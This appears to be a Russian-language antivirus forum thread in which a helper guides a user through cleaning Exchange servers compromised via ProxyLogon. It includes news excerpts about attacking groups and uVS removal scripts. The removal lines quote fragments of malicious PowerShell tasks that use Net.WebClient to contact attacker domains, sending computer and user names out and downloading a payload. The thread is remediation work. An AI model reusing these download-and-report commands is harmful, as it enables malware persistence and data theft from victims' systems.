[QUOTE]Владимир Шариков написал:
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)[/QUOTE]

это на клиентских системах происходит?

[QUOTE]Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]

[B]я думаю стоит.[/B] эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)

[QUOTE]После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.
[/QUOTE]

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/

[QUOTE]santy написал:
скриншот не увидел или не прикрепился[/QUOTE]
да, теперь вижу. файл лучше отправить на virustotal.com для проверки другими антивирусами. возможно, и бэкдор

[QUOTE]Владимир Шариков написал:
твик 39 что то найти не могу, найду.Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)[/QUOTE]

uVS - дополнительно-твики. твик 39 в низу окна.

скриншот не увидел или не прикрепился

если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

по второму серверу:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
[code]

;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply

QUIT
[/code]
без перезагрузка, пишем о старых и новых проблемах.
------------

[QUOTE]Владимир Шариков написал:
[QUOTE] santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]можно и второй образ положить[/QUOTE][/QUOTE]

по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"

[QUOTE]Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]

можно и второй образ положить

выполните в uVS скрипт для очистки задач, без перезагрузки системы:[B] поправил скрипт[/B]

[code] ;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT

apply

QUIT
[/code]

Экстренные исправления для недавно обнаруженных критических уязвимостей в почтовом сервере Microsoft Exchange появились не сразу, и у организаций было мало времени на подготовку до начала массовой эксплуатации.

Эта ошибка, получившая название[B] ProxyLogon[/B], использовалась в дикой природе еще до того, как Microsoft получила отчет об уязвимости, что дает злоумышленникам двухмесячный старт для взлома целей до появления обновлений безопасности.

Уязвимые серверы являются горячими целями для широкого спектра групп злоумышленников, которые ищут исходную точку опоры в сети для шпионажа или финансовых целей. [B]Злоумышленники, Ransomware и майнинг криптовалют уже использовали ProxyLogon.[/B]

С выпущенными исправлениями и появлением кода эксплойта PoC в сети тысячи серверов Microsoft Exchange по всему миру продолжают оставаться уязвимыми, а количество атак по-прежнему вызывает тревогу.

https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/